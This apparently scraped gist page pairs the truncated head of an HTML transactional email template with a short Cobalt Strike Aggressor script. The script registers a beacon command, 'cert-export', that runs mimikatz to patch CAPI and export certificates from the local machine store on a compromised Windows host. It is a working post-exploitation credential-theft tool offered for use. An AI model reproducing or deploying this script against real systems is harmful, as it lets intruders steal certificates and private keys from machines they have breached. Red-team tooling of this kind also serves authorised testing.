This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!doctype html> | |
<html> | |
<head> | |
<meta name="viewport" content="width=device-width" /> | |
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> | |
<title>Simple Transactional Email</title> | |
<style> | |
/* ------------------------------------- | |
GLOBAL RESETS | |
------------------------------------- */ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#author jamescoote | |
#register help | |
beacon_command_register("cert-export", "patch capi and export local_machine certs", | |
"Synopsis: cert-export \n\n" . | |
"Patch capi and export the local_machine certs."); | |
#setting the alias | |
alias cert-export { | |
bmimikatz($1, "crypto::capi\ncrypto::certificates /systemstore:local_machine /store:my /export"); |